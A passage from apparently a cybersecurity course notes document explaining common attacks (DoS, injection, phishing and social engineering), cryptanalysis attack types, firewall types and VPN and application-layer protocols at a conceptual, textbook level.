 HTTPS spoofing—HTTPS is generally considered the more secure version of HTTP, but can
also be used to trick the browser into thinking that a malicious website is safe. The attacker
uses ―HTTPS‖ in the URL to conceal the malicious nature of the website.

Denial-of-Service Attack

A Denial-of-Service (DoS) attack overloads the target system with a large volume of traffic,
hindering the ability of the system to function normally. An attack involving multiple devices
is known as a distributed denial-of-service (DDoS) attack.

DoS attack techniques include:

 HTTP flood DDoS—the attacker uses HTTP requests that appear legitimate to overwhelm an
application or web server. This technique does not require high bandwidth or malformed
packets, and typically tries to force a target system to allocate as many resources as possible
for each request.
 SYN flood DDoS—initiating a Transmission Control Protocol (TCP) connection sequence
involves sending a SYN request that the host must respond to with a SYN-ACK that
acknowledges the request, and then the requester must respond with an ACK. Attackers can
exploit this sequence, tying up server resources, by sending SYN requests but not responding
to the SYN-ACKs from the host.
 UDP flood DDoS—a remote host is flooded with User Datagram Protocol (UDP) packets
sent to random ports. This technique forces the host to search for applications on the affected
ports and respond with ―Destination Unreachable‖ packets, which uses up the host resources.

Page | 21
 ICMP flood—a barrage of ICMP Echo Request packets overwhelms the target, consuming
both inbound and outgoing bandwidth. The servers may try to respond to each request with
an ICMP Echo Reply packet, but cannot keep up with the rate of requests, so the system
slows down.
 NTP amplification—Network Time Protocol (NTP) servers are accessible to the public and
can be exploited by an attacker to send large volumes of UDP traffic to a targeted server. This
is considered an amplification attack due to the query-to-response ratio of 1:20 to 1:200,
which allows an attacker to exploit open NTP servers to execute high-volume, high-
bandwidth DDoS attacks.

Injection Attacks

Injection attacks exploit a variety of vulnerabilities to directly insert malicious input into the
code of a web application. Successful attacks may expose sensitive information, execute a
DoS attack or compromise the entire system.

Here are some of the main vectors for injection attacks:

 SQL injection—an attacker enters an SQL query into an end user input channel, such as a
web form or comment field. A vulnerable application will send the attacker’s data to the
database, and will execute any SQL commands that have been injected into the query. Most
web applications use databases based on Structured Query Language (SQL), making them
vulnerable to SQL injection. A new variant on this attack is NoSQL attacks, targeted against
databases that do not use a relational data structure.
 Code injection—an attacker can inject code into an application if it is vulnerable. The web
server executes the malicious code as if it were part of the application.
 OS command injection—an attacker can exploit a command injection vulnerability to input
commands for the operating system to execute. This allows the attack to exfiltrate OS data or
take over the system.
 LDAP injection—an attacker inputs characters to alter Lightweight Directory Access
Protocol (LDAP) queries. A system is vulnerable if it uses unsanitized LDAP queries. These
attacks are very severe because LDAP servers may store user accounts and credentials for an
entire organization.
 XML eXternal Entities (XXE) Injection—an attack is carried out using specially-constructed
XML documents. This differs from other attack vectors because it exploits inherent
vulnerabilities in legacy XML parsers rather than unvalidated user inputs. XML documents
can be used to traverse paths, execute code remotely and execute server-side request forgery
(SSRF).
 Cross-Site Scripting (XSS)—an attacker inputs a string of text containing malicious
JavaScript. The target’s browser executes the code, enabling the attacker to redirect users to a
malicious website or steal session cookies to hijack a user’s session. An application is
vulnerable to XSS if it doesn’t sanitize user inputs to remove JavaScript code.

What is a risk?

Risk is the probability of a negative (harmful) event occurring as well as the potential of scale
of that harm. Your organizational risk fluctuates over time, sometimes even on a daily basis,
due to both internal and external factors.

Page | 22
A slightly more technical angle, the Open FAIR body of knowledge defines cyber risk as the
probable frequency and probably magnitude of loss. Sounds complicated, until we break it
down: ―For starters,‖ Rudis says, "there is no ethereal risk. Something is at risk, be it a
system, device, business process, bank account, your firm’s reputation or human life.‖
This is where cybersecurity teams can begin to measure that risk:

1. Estimate how often an adversary or attacker is likely to attempt to exploit a

vulnerability to cause the desired harm.
2. Gauge how well your existing systems, controls and processes can standup to those
attempts.
3. Determine the value of the impact or harm the adversary may cause if the adversary is
indeed successful.

One way of describing risk was consequence X likelihood, but as security teams have
advanced their processes and intelligence, we see that you have to also account for the
safeguards you’ve already put in place.

Risk = threat x vulnerability

This is another way of looking at risk, albeit a bit simplified:

Vulnerability x Threat = Risk
We can sum up this calculation with the concepts from above: that a single vulnerability
multiplied by the potential threat (frequency, existing safeguards, and potential value loss)
can give you an estimate of the risk involved. In order for organizations to begin risk
mitigation and risk management, you first need to understand your vulnerabilities and the
threats to those vulnerabilities. This is no small task.

7. What are social engineering attacks? Explain different methods of attacks. Explain
different prevention methods of social engineering attacks.

Answer- What is social engineering

Social engineering is the term used for a broad range of malicious activities accomplished
through human interactions. It uses psychological manipulation to trick users into making
security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first investigates the
intended victim to gather necessary background information, such as potential points of entry
and weak security protocols, needed to proceed with the attack. Then, the attacker moves to
gain the victim’s trust and provide stimuli for subsequent actions that break security
practices, such as revealing sensitive information or granting access to critical resources.

7 Common Types of Cyberattacks

Page | 23
If you've ever studied famous battles in history, you'll know that no two are exactly
alike. Still, there are similar strategies and tactics often used in battle because they are
time-proven to be effective.

Similarly, when a criminal is trying to hack an organization, they won't re-invent the
wheel unless they absolutely have to: They'll draw upon common types of hacking
techniques that are known to be highly effective, such as malware, phishing, or cross-site
scripting (XSS).

Whether you're trying to make sense of the latest data breach headline in the news or
analyzing an incident in your own organization, it helps to understand the different
attack vectors a malicious actor might try to cause harm. Here’s an overview of some of
the most common types of cybersecurity attacks seen today.

Malware

If you've ever seen an antivirus alert pop up on your screen, or if you've mistakenly
clicked a malicious email attachment, then you've had a close call with malware.
Attackers love to use malware to gain a foothold in users' computers—and,
consequently, the offices they work in—because it can be so effective.

―Malware‖ refers to various forms of harmful software, such as viruses and ransomware.
Once malware is in your computer, it can wreak all sorts of havoc, from taking control of
your machine, to monitoring your actions and keystrokes, to silently sending all sorts of
confidential data from your computer or network to the attacker's home base.

Attackers will use a variety of methods to get malware into your computer, but at some
stage it often requires the user to take an action to install the malware. This can include
clicking a link to download a file, or opening an attachment that may look harmless (like
a Word document or PDF attachment), but actually has a malware installer hidden
within.

Learn more about malware attacks.

Phishing

Of course, chances are you wouldn't just open a random attachment or click on a link in
any email that comes your way—there has to be a compelling reason for you to take
action. Attackers know this, too. When an attacker wants you to install malware or
divulge sensitive information, they often turn to phishing tactics, or pretending to be
someone or something else to get you to take an action you normally wouldn’t. Since
they rely on human curiosity and impulses, phishing attacks can be difficult to stop.

In a phishing attack, an attacker may send you an email that appears to be from someone
you trust, like your boss or a company you do business with. The email will seem
legitimate, and it will have some urgency to it (e.g. fraudulent activity has been detected
on your account). In the email, there will be an attachment to open or a link to click.

Upon opening the malicious attachment, you’ll thereby install malware in your
computer. If you click the link, it may send you to a legitimate-looking website that asks

Page | 24
for you to log in to access an important file—except the website is actually a trap used to
capture your credentials when you try to log in.

In order to combat phishing attempts, understanding the importance of verifying email

senders and attachments/links is essential.

Learn more about phishing attacks.

SQL Injection Attack

SQL (pronounced ―sequel‖) stands for structured query language; it’s a programming
language used to communicate with databases. Many of the servers that store critical
data for websites and services use SQL to manage the data in their databases.

A SQL injection attack specifically targets this kind of server, using malicious code to
get the server to divulge information it normally wouldn’t. This is especially problematic
if the server stores private customer information from the website, such as credit card
numbers, usernames and passwords (credentials), or other personally identifiable
information, which are tempting and lucrative targets for an attacker.

An SQL injection attack works by exploiting any one of the known SQL vulnerabilities
that allow the SQL server to run malicious code. For example, if a SQL server is
vulnerable to an injection attack, it may be possible for an attacker to go to a website's
search box and type in code that would force the site's SQL server to dump all of its
stored usernames and passwords for the site.

Learn more about SQL injection attacks.

Cross-Site Scripting (XSS)

In an SQL injection attack, an attacker goes after a vulnerable website to target its stored
data, such as user credentials or sensitive financial data. But if the attacker would rather
directly target a website's users, they may opt for a cross-site scripting attack.

Similar to an SQL injection attack, this attack also involves injecting malicious code into
a website, but in this case the website itself is not being attacked. Instead, the malicious
code the attacker has injected only runs in the user's browser when they visit the attacked
website, and it goes after the visitor directly, not the website.

One of the most common ways an attacker can deploy a cross-site scripting attack is by
injecting malicious code into a comment or a script that could automatically run. For
example, they could embed a link to a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a website’s reputation by placing

the users' information at risk without any indication that anything malicious even
occurred. Any sensitive information a user sends to the site—such as their credentials,
credit card information, or other private data—can be hijacked via cross-site scripting
without the website owners realizing there was even a problem in the first place.

Learn more about cross-site scripting.

Page | 25
Denial-of-Service (DoS)

Imagine you're sitting in traffic on a one-lane country road, with cars backed up as far as
the eye can see. Normally this road never sees more than a car or two, but a county fair
and a major sporting event have ended around the same time, and this road is the only
way for visitors to leave town. The road can't handle the massive amount of traffic, and
as a result it gets so backed up that pretty much no one can leave.

That's essentially what happens to a website during a denial-of-service (DoS) attack. If

you flood a website with more traffic than it was built to handle, you'll overload the
website's server and it'll be nigh-impossible for the website to serve up its content to
visitors who are trying to access it.

This can happen for innocuous reasons of course, say if a massive news story breaks and
a newspaper's website gets overloaded with traffic from people trying to find out more.
But often, this kind of traffic overload is malicious, as an attacker floods a website with
an overwhelming amount of traffic to essentially shut it down for all users.

In some instances, these DoS attacks are performed by many computers at the same time.
This scenario of attack is known as a Distributed Denial-of-Service Attack (DDoS). This
type of attack can be even more difficult to overcome due to the attacker appearing from
many different IP addresses around the world simultaneously, making determining the
source of the attack even more difficult for network administrators.

Learn more about denial-of-service attacks.

Session Hijacking and Man-in-the-Middle Attacks

When you're on the internet, your computer has a lot of small back-and-forth
transactions with servers around the world letting them know who you are and
requesting specific websites or services. In return, if everything goes as it should, the
web servers should respond to your request by giving you the information you're
accessing. This process, or session, happens whether you are simply browsing or when
you are logging into a website with your username and password.

The session between your computer and the remote web server is given a unique session
ID, which should stay private between the two parties; however, an attacker can hijack
the session by capturing the session ID and posing as the computer making a request,
allowing them to log in as an unsuspecting user and gain access to unauthorized
information on the web server. There are a number of methods an attacker can use to
steal the session ID, such as a cross-site scripting attack used to hijack session IDs.

An attacker can also opt to hijack the session to insert themselves between the requesting
computer and the remote server, pretending to be the other party in the session. This
allows them to intercept information in both directions and is commonly called a man -in-
the-middle attack.

Learn more about man-in-the-middle attacks.

Page | 26
Credential Reuse

Users today have so many logins and passwords to remember that it’s tempting to reuse
credentials here or there to make life a little easier. Even though secu rity best practices
universally recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely on.

Once attackers have a collection of usernames and passwords from a breached website or
service (easily acquired on any number of black market websites on the internet), they
know that if they use these same credentials on other websites there’s a chance they’ll be
able to log in.

No matter how tempting it may be to reuse credentials for your email, bank account, and
your favorite sports forum, it’s possible that one day the forum will get hacked, giving
an attacker easy access to your email and bank account. When it comes to credentials,
variety is essential. Password managers are available and can be helpful when it comes
to managing the various credentials you use.

This is just a selection of common attack types and techniques (follow this link to learn
more about web application vulnerabilities, specifically). It is not intended to be
exhaustive, and attackers do evolve and develop new methods as needed; however, being
aware of, and mitigating these types of attacks will significantly improve your security
posture.

Social engineering attack techniques

Social engineering attacks come in many different forms and can be performed anywhere
where human interaction is involved. The following are the five most common forms of
digital social engineering assaults.

Baiting
As its name implies, baiting attacks use a false promise to pique a victim’s greed or curiosity.
They lure users into a trap that steals their personal information or inflicts their systems with
malware.

The most reviled form of baiting uses physical media to disperse malware. For example,
attackers leave the bait—typically malware-infected flash drives—in conspicuous areas
where potential victims are certain to see them (e.g., bathrooms, elevators, the parking lot of a
targeted company). The bait has an authentic look to it, such as a label presenting it as the
company’s payroll list.

Victims pick up the bait out of curiosity and insert it into a work or home computer, resulting
in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world. Online forms of
baiting consist of enticing ads that lead to malicious sites or that encourage users to download
a malware-infected application.

Page | 27
Scareware
Scareware involves victims being bombarded with false alarms and fictitious threats. Users
are deceived to think their system is infected with malware, prompting them to install
software that has no real benefit (other than for the perpetrator) or is malware itself.
Scareware is also referred to as deception software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners appearing in your

browser while surfing the web, displaying such text such as, ―Your computer may be infected
with harmful spyware programs.‖ It either offers to install the tool (often malware-infected)
for you, or will direct you to a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or makes offers
for users to buy worthless/harmful services.

Pretexting
Here an attacker obtains information through a series of cleverly crafted lies. The scam is
often initiated by a perpetrator pretending to need sensitive information from a victim so as to
perform a critical task.

The attacker usually starts by establishing trust with their victim by impersonating co-
workers, police, bank and tax officials, or other persons who have right-to-know authority.
The pretexter asks questions that are ostensibly required to confirm the victim’s identity,
through which they gather important personal data.

All sorts of pertinent information and records is gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff vacation dates,
bank records and even security information related to a physical plant.

Phishing
As one of the most popular social engineering attack types, phishing scams are email and text
message campaigns aimed at creating a sense of urgency, curiosity or fear in victims. It then
prods them into revealing sensitive information, clicking on links to malicious websites, or
opening attachments that contain malware.

An example is an email sent to users of an online service that alerts them of a policy violation
requiring immediate action on their part, such as a required password change. It includes a
link to an illegitimate website—nearly identical in appearance to its legitimate version—
prompting the unsuspecting user to enter their current credentials and new password. Upon
form submittal the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing campaigns,
detecting and blocking them are much easier for mail servers having access to threat sharing
platforms.

Page | 28
Spear phishing
This is a more targeted version of the phishing scam whereby an attacker chooses specific
individuals or enterprises. They then tailor their messages based on characteristics, job
positions, and contacts belonging to their victims to make their attack less conspicuous. Spear
phishing requires much more effort on behalf of the perpetrator and may take weeks and
months to pull off. They’re much harder to detect and have better success rates if done
skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an organization’s

IT consultant, sends an email to one or more employees. It’s worded and signed exactly as
the consultant normally does, thereby deceiving recipients into thinking it’s an authentic
message. The message prompts recipients to change their password and provides them with a
link that redirects them to a malicious page where the attacker now captures their credentials.

Page | 29
 *Chapter -2*
Cryptography and Cryptanalysis

1. Cryptanalysis and Types of Attacks.

Answer- Cryptology has two parts namely, Cryptography which focuses on creating secret
codes and Cryptanalysis which is the study of the cryptographic algorithm and the breaking
of those secret codes. The person practicing Cryptanalysis is called a Cryptanalyst. It helps
us to better understand the cryptosystems and also helps us improve the system by finding
any weak point and thus work on the algorithm to create a more secure secret code. For
example, a Cryptanalyst might try to decipher a ciphertext to derive the plaintext. It can
help us to deduce the plaintext or the encryption key.
To determine the weak points of a cryptographic system, it is important to attack the
system. This attacks are called Cryptanalytic attacks. The attacks rely on nature of the
algorithm and also knowledge of the general characteristics of the plaintext, i.e., plaintext
can be a regular document written in English or it can be a code written in Java. Therefore,
nature of the plaintext should be known before trying to use the attacks.

Types of Cryptanalytic attacks:

 Known-Plaintext Analysis (KPA) : In this type of attack, some plaintext-ciphertext
pairs are already known. Attacker maps them in order to find the encryption key. This
attack is easier to use as a lot of information is already available.
 Chosen-Plaintext Analysis (CPA) : In this type of attack, the attacker chooses random
plaintexts and obtains the corresponding ciphertexts and tries to find the encryption key.
Its very simple to implement like KPA but the success rate is quite low.
 Ciphertext-Only Analysis (COA) : In this type of attack, only some cipher-text is
known and the attacker tries to find the corresponding encryption key and plaintext. Its
the hardest to implement but is the most probable attack as only ciphertext is required.
 Man-In-The-Middle (MITM) attack : In this type of attack, attacker intercepts the
message/key between two communicating parties through a secured channel.
 Adaptive Chosen-Plaintext Analysis (ACPA) : This attack is similar CPA. Here, the
attacker requests the cipher texts of additional plaintexts after they have ciphertexts for
some texts.
 Birthday attack: This attack exploits the probability of two or more individuals sharing
the same birthday in a group of people. In cryptography, this attack is used to find
collisions in a hash function.
 Side-channel attack: This type of attack is based on information obtained from the
physical implementation of the cryptographic system, rather than on weaknesses in the
algorithm itself. Side-channel attacks include timing attacks, power analysis attacks,
electromagnetic attacks, and others.
 Brute-force attack: This attack involves trying every possible key until the correct one
is found. While this attack is simple to implement, it can be time-consuming and
computationally expensive, especially for longer keys.
 Differential cryptanalysis: This type of attack involves comparing pairs of plaintexts
and their corresponding ciphertexts to find patterns in the encryption algorithm. It can
be effective against block ciphers with certain properties.

Page | 30
2. Explain Firewall policy and Intrusion Prevention policy in Cyber Security.

Answer- Firewall policies let you group several firewall rules so that you can update them all
at once, effectively controlled by Identity and Access Management (IAM) roles. These
policies contain rules that can explicitly deny or allow connections, as do Virtual Private
Cloud (VPC) firewall rules.

Intrusion prevention system- An intrusion prevention system (IPS) is a network

security tool (which can be a hardware device or software) that continuously monitors a
network for malicious activity and takes action to prevent it, including reporting, blocking, or
dropping it, when it does occur.
It is more advanced than an intrusion detection system (IDS), which simply detects malicious
activity but cannot take action against it beyond alerting an administrator. Intrusion
prevention systems are sometimes included as part of a next-generation firewall (NGFW) or
unified threat management (UTM) solution. Like many network security technologies, they
must be powerful enough to scan a high volume of traffic without slowing down network
performance.

3. Difference between Cryptography and Cryptanalysis.

Answer- Comparison between Cryptography and Cryptanalysis:

Cryptography Cryptanalysis

The art or science of

The art of obtaining
encrypting plain messages
plain text from a cipher
Defintion into cipher text for security
text without knowledge
of the messages especially
of key.
while transmission.

From Greek κρσπτός,

"hidden, secret"; From Greek kryptós,
Origin and γράφειν, graphein, "hidden", and analýein,
"writing", or -λογία, -logia, "to loosen" or "to untie"
"study", respectively

Practitioner Cryptographer Cryptanalyst

Focus Secret writing Breaking secrets

Page | 31
  Hash or cypher
 Obtaining an original or needs to be more
Concern for cipher or hash
completely new hash. conservative and
 Efficient Hash or cipher therefore slower
 Less original

 It uses operations like

 Depends on the
substitution,
nature of the
transposition and
algorithm and
product systems
mostly at some
 The system may use
Characteristics knowledge of the
same key or different
characteristics of
keys for sender and
plaintext
receiver
 It attempts to find
 Processing techniques
out the ciphertext or
include block cipher and
the key
stream cipher

4. What is Cryptography. Features of cryptography?

Answer- Cryptography is the study of securing communications from outside

observers. Encryption algorithms take the original message, or plaintext, and converts it
into ciphertext, which is not understandable. The key allows the user to decrypt the message,
thus ensuring on they can read the message. The strength of the randomness of
an encryption is also studied, which makes it harder for anyone to guess the key or input of
the algorithm. Cryptography is how we can achieve more secure and robust connections to
elevate our privacy. Advancements in cryptography makes it harder to break encryptions so
that encrypted files, folders, or network connections are only accessible to authorized users.

Cryptography focuses on four different objectives:

1. Confidentiality: Confidentiality ensures that only the intended recipient can decrypt
the message and read its contents.
2. Non-repudiation: Non-repudiation means the sender of the message cannot
backtrack in the future and deny their reasons for sending or creating the message.
3. Integrity: Integrity focuses on the ability to be certain that the information contained
within the message cannot be modified while in storage or transit.
4. Authenticity: Authenticity ensures the sender and recipient can verify each other’s
identities and the destination of the message.

Types of Cryptography
Cryptography can be broken down into three different types:

 Secret Key Cryptography

 Public Key Cryptography
 Hash Functions

Secret Key Cryptography, or symmetric cryptography, uses a single key to encrypt data. Both
encryption and decryption in symmetric cryptography use the same key, making this the
Page | 32
 easiest form of cryptography. The cryptographic algorithm utilizes the key in a cipher to
encrypt the data, and when the data must be accessed again, a person entrusted with the secret
key can decrypt the data. Secret Key Cryptography can be used on both in-transit and at-
rest data, but is commonly only used on at-rest data, as sending the secret to the recipient of
the message can lead to compromise.

Examples:

 AES
 DES
 Caesar Cipher

Public Key Cryptography, or asymmetric cryptography, uses two keys to encrypt data. One is
used for encryption, while the other key can decrypts the message. Unlike symmetric
cryptography, if one key is used to encrypt, that same key cannot decrypt the message, rather
the other key shall be used.
One key is kept private, and is called the ―private key‖, while the other is shared publicly and
can be used by anyone, hence it is known as the ―public key‖. The mathematical relation of
the keys is such that the private key cannot be derived from the public key, but the public key
can be derived from the private. The private key should not be distributed and should remain
with the owner only. The public key can be given to any other entity.

Examples:

 ECC
 Diffie-Hellman
 DSS

Hash functions are irreversible, one-way functions which protect the data, at the cost of not
being able to recover the original message. Hashing is a way to transform a given string into a
fixed length string. A good hashing algorithm will produce unique outputs for each input
given. The only way to crack a hash is by trying every input possible, until you get the exact
same hash. A hash can be used for hashing data (such as passwords) and in certificates.

Some of the most famous hashing algorithms are:

 MD5
 SHA-1
 SHA-2 family which includes SHA-224, SHA-256, SHA-384, and SHA-512
 SHA-3
 Whirlpool
 Blake 2
 Blake 3

Page | 33
5. What is Firewalls? Types of Firewalls.

Answer- A firewall is a type of cybersecurity tool used to filter traffic on a network.

Firewalls can separate network nodes from external traffic sources, internal traffic sources, or
even specific applications. Firewalls can be software, hardware, or cloud-based, with each
type of firewall having unique pros and cons.

The primary goal of a firewall is to block malicious traffic requests and data packets while
letting through legitimate traffic.

There are mainly three types of firewalls, such as software firewalls, hardware firewalls, or
both, depending on their structure. Each type of firewall has different functionality but the
same purpose. However, it is best practice to have both to achieve maximum possible
protection.

A hardware firewall is a physical device that attaches between a computer network and a
gateway. For example- a broadband router. A hardware firewall is sometimes referred to as
an Appliance Firewall. On the other hand, a software firewall is a simple program installed
on a computer that works through port numbers and other installed software. This type of
firewall is also called a Host Firewall.

Besides, there are many other types of firewalls depending on their features and the level of
security they provide. The following are types of firewall techniques that can be implemented
as software or hardware:

o Packet-filtering Firewalls
o Circuit-level Gateways
o Application-level Gateways (Proxy Firewalls)
o Stateful Multi-layer Inspection (SMLI) Firewalls
o Next-generation Firewalls (NGFW)
o Threat-focused NGFW
o Network Address Translation (NAT) Firewalls
o Cloud Firewalls
o Unified Threat Management (UTM) Firewalls

Packet-filtering Firewalls

A packet filtering firewall is the most basic type of firewall. It acts like a management
program that monitors network traffic and filters incoming packets based on configured
security rules. These firewalls are designed to block network traffic IP protocols, an IP
address, and a port number if a data packet does not match the established rule-set.

While packet-filtering firewalls can be considered a fast solution without many resource
requirements, they also have some limitations. Because these types of firewalls do not
prevent web-based attacks, they are not the safest.

Page | 34
Circuit-level Gateways

Circuit-level gateways are another simplified type of firewall that can be easily configured to
allow or block traffic without consuming significant computing resources. These types of
firewalls typically operate at the session-level of the OSI model by verifying TCP
(Transmission Control Protocol) connections and sessions. Circuit-level gateways are
designed to ensure that the established sessions are protected.

Typically, circuit-level firewalls are implemented as security software or pre-existing

firewalls. Like packet-filtering firewalls, these firewalls do not check for actual data,
although they inspect information about transactions. Therefore, if a data contains malware,
but follows the correct TCP connection, it will pass through the gateway. That is why circuit-
level gateways are not considered safe enough to protect our systems.

Application-level Gateways (Proxy Firewalls)

Proxy firewalls operate at the application layer as an intermediate device to filter incoming
traffic between two end systems (e.g., network and traffic systems). That is why these
firewalls are called 'Application-level Gateways'.

Unlike basic firewalls, these firewalls transfer requests from clients pretending to be original
clients on the web-server. This protects the client's identity and other suspicious information,
keeping the network safe from potential attacks. Once the connection is established, the
proxy firewall inspects data packets coming from the source. If the contents of the incoming
data packet are protected, the proxy firewall transfers it to the client. This approach creates an
additional layer of security between the client and many different sources on the network.

Stateful Multi-layer Inspection (SMLI) Firewalls

Stateful multi-layer inspection firewalls include both packet inspection technology

and TCP handshake verification, making SMLI firewalls superior to packet-filtering firewalls
or circuit-level gateways. Additionally, these types of firewalls keep track of the status of
established connections.

In simple words, when a user establishes a connection and requests data, the SMLI firewall
creates a database (state table). The database is used to store session information such as
source IP address, port number, destination IP address, destination port number, etc.
Connection information is stored for each session in the state table. Using stateful inspection
technology, these firewalls create security rules to allow anticipated traffic.

In most cases, SMLI firewalls are implemented as additional security levels. These types of
firewalls implement more checks and are considered more secure than stateless firewalls.
This is why stateful packet inspection is implemented along with many other firewalls to
track statistics for all internal traffic. Doing so increases the load and puts more pressure on
computing resources. This can give rise to a slower transfer rate for data packets than other
solutions.

Page | 35
Next-generation Firewalls (NGFW)

Many of the latest released firewalls are usually defined as 'next-generation firewalls'.
However, there is no specific definition for next-generation firewalls. This type of firewall is
usually defined as a security device combining the features and functionalities of other
firewalls. These firewalls include deep-packet inspection (DPI), surface-level packet
inspection, and TCP handshake testing, etc.

NGFW includes higher levels of security than packet-filtering and stateful inspection
firewalls. Unlike traditional firewalls, NGFW monitors the entire transaction of data,
including packet headers, packet contents, and sources. NGFWs are designed in such a way
that they can prevent more sophisticated and evolving security threats such as malware
attacks, external threats, and advance intrusion.

Threat-focused NGFW

Threat-focused NGFW includes all the features of a traditional NGFW. Additionally, they
also provide advanced threat detection and remediation. These types of firewalls are capable
of reacting against attacks quickly. With intelligent security automation, threat-focused
NGFW set security rules and policies, further increasing the security of the overall defense
system.

In addition, these firewalls use retrospective security systems to monitor suspicious activities
continuously. They keep analyzing the behavior of every activity even after the initial
inspection. Due to this functionality, threat-focus NGFW dramatically reduces the overall
time taken from threat detection to cleanup.

Network Address Translation (NAT) Firewalls

Network address translation or NAT firewalls are primarily designed to access Internet traffic
and block all unwanted connections. These types of firewalls usually hide the IP addresses of
our devices, making it safe from attackers.

When multiple devices are used to connect to the Internet, NAT firewalls create a unique IP
address and hide individual devices' IP addresses. As a result, a single IP address is used for
all devices. By doing this, NAT firewalls secure independent network addresses from
attackers scanning a network for accessing IP addresses. This results in enhanced protection
against suspicious activities and attacks.

In general, NAT firewalls works similarly to proxy firewalls. Like proxy firewalls, NAT
firewalls also work as an intermediate device between a group of computers and external
traffic.

Cloud Firewalls

Whenever a firewall is designed using a cloud solution, it is known as a cloud firewall

or FaaS (firewall-as-service). Cloud firewalls are typically maintained and run on the
Internet by third-party vendors. This type of firewall is considered similar to a proxy firewall.

Page | 36
The reason for this is the use of cloud firewalls as proxy servers. However, they are
configured based on requirements.

The most significant advantage of cloud firewalls is scalability. Because cloud firewalls have
no physical resources, they are easy to scale according to the organization's demand or
traffic-load. If demand increases, additional capacity can be added to the cloud server to filter
out the additional traffic load. Most organizations use cloud firewalls to secure their internal
networks or entire cloud infrastructure.

Unified Threat Management (UTM) Firewalls

UTM firewalls are a special type of device that includes features of a stateful inspection
firewall with anti-virus and intrusion prevention support. Such firewalls are designed to
provide simplicity and ease of use. These firewalls can also add many other services, such as
cloud management, etc.

6. What is security protocol used for VPN security? What is security at the application
layer in cyber security? Difference between PGP and S/MIME.

Answer- Most common VPN protocols

VPNs are using tunneling protocols that act as rules for sending the data. It provides
detailed instructions on packaging the data and what checks to perform when it reaches its
destination. These different methods directly affect the process speed and security. Here
are the most popular ones.

Internet Protocol Security (IPSec)

IPSec is a VPN tunneling protocol that secures data exchange by enforcing session
authentication and data packet encryption. It is twofold encryption — the encrypted
message sits in the data packet, which is further encrypted again. IPSec protocol combines
with other protocols for added security and frequently utilizes Site-to-site VPN setups due to
its high compatibility.

Layer 2 Tunneling Protocol (L2TP)

L2TP works by generating a secure tunnel between two L2TP connection points. Once
established, it uses an additional tunneling protocol to encrypt the sent data, i.e., IPSec.
L2TP's complex architecture helps to ensure high security of the exchanged data. It's another
popular choice for Site-to-site setups, especially when higher security is needed.

Page | 37
Point–to–Point Tunneling Protocol (PPTP)

PPTP is another tunneling protocol that creates a tunnel with a PPTP cipher. However,
since the creation of the cipher in the '90s, the computing power has increased exponentially.
Brute-forcing the cipher wouldn't take too long to crack it to reveal the exchanged data. For
this reason, technology rarely uses this cipher — a replacement containing more secure
tunneling protocols with more advanced encryption is preferable.

SSL and TLS

Secure Socket Layer and Transport Layer Security protocols are the same standard that
encrypts HTTPS web pages. That way, the web browser acts as the client, and user access is
limited to specific applications rather than the entire network. Since almost all browsers come
equipped with SSL and TLS connections, no additional software is usually required. Usually,
remote access VPNs use SSL/TLS.

OpenVPN

OpenVPN is an open-source enhancement of the SSL/TLS framework with additional

cryptographic algorithms to make your encrypted tunnel even safer. It's the go-to tunneling
protocol for its high security and efficiency. Though, compatibility and setup can be a bit hit
or miss as you won't be able to install it natively on many devices to form router to router
VPN networks. So, the performance may vary.

It comes in User Datagram Protocol (UDP) or Transmission Control Protocol (TCP)

versions. UDP is faster because it uses fewer data checks, while TCP is slower but better
protects data integrity. As a whole, OpenVPN is a well-rounded and secure tunneling
protocol and is popular for both remote access and site-to-site virtual private network uses.

Secure Shell (SSH)

Like the other option, SSH generates an encrypted connection and allows port
forwarding to remote machines via a secured channel. It is useful for accessing your office
desktop via your laptop at home. While it does add additional flexibility, SSH channels

Page | 38
should always be under close supervision to provide a direct entry point for breach. That's
why it's a better fit only in remote access setups.

Wireguard

The most recent widely available tunneling protocol is less complex but much more efficient
and safer than IPSec and OpenVPN. It relies on highly streamlined code to squeeze the
best possible performance with a minimal margin of error. While it still is in the early
adoption stage, you could find offices using Site-to-site connections based on Wireguard.
There even are proprietary WireGuard implementations like NordLynx.

Application layer in network security?

The OSI and TCP/IP models

The Open Systems Interconnection (OSI) model and the TCP/IP Model explain the functions
performed for two computers to communicate over a network. These functions are divided
into layers, as shown below:

The topmost layer in both cases is the application layer. A user interacts with the application
layer. The application layer is used to display information to the user as well as receive
information from the user. It allows application-to-application communication by using
services of the layers that are below it.

For example, in a client-server architecture, the client sends a request to the web server
running on a different host. The server will then send over the required information as a
response.

Another example is a peer-to-peer architecture in which different hosts communicate with

each other, and there is no assigned client or server. In this case, all the hosts will participate
in sharing files, and, at one point, one host may be the client when it needs to download a file.
At another point, the same host may be the server when it uploads a file.

Application layer protocols

As we have seen, applications can communicate with each other using requests and responses
by sending messages to each other. These messages must be structured properly so that the
end systems can understand them correctly. Application layer protocols describe the structure
as well as the procedure in which these messages are sent. These protocols are responsible
for:

 defining the syntax as well as the meaning of messages sent

 defining which type of message is received, e.g., request or response
 describing the process followed when sending or receiving a message

Page | 39
Examples

1. HTTP

HyperText Transfer Protocol is the web’s application layer protocol. It is a client-server

protocol in which browsers are the clients, and they request resources from web servers
residing on different hosts.
The format of an HTTP request is as follows:

There are many different methods defined in HTTP (such as GET, POST, DELETE, PUT,
and PATCH), but the one that is most commonly used is GET, which retrieves a resource
from the host. There are also a variety of other headers that can be included in a request.
These messages can also include any data that needs to be sent to the server.

The status code and message allow the client to understand whether or not their request was
successful. Status 200 indicates a successful request, whereas 404 means that the resource
was not found. There are other status codes as well that are understood by HTTP
applications.

2. FTP

File Transfer Protocol (FTP) is used to share files between local and remote hosts. The first
requirement is for the user to authenticate themselves, after which a control connection is
established with the remote server. There are separate control and data connections between
the server and client. Files can only be safely transmitted once a control connection is
successfully established.

3. DNS

Identification of servers can be done in two ways:

1. using hostname
2. using IP Addresses

It is easier for humans to identify hosts using their hostnames instead of IP addresses.
However, routers prefer to identify hosts using IP addresses since they are of fixed length and
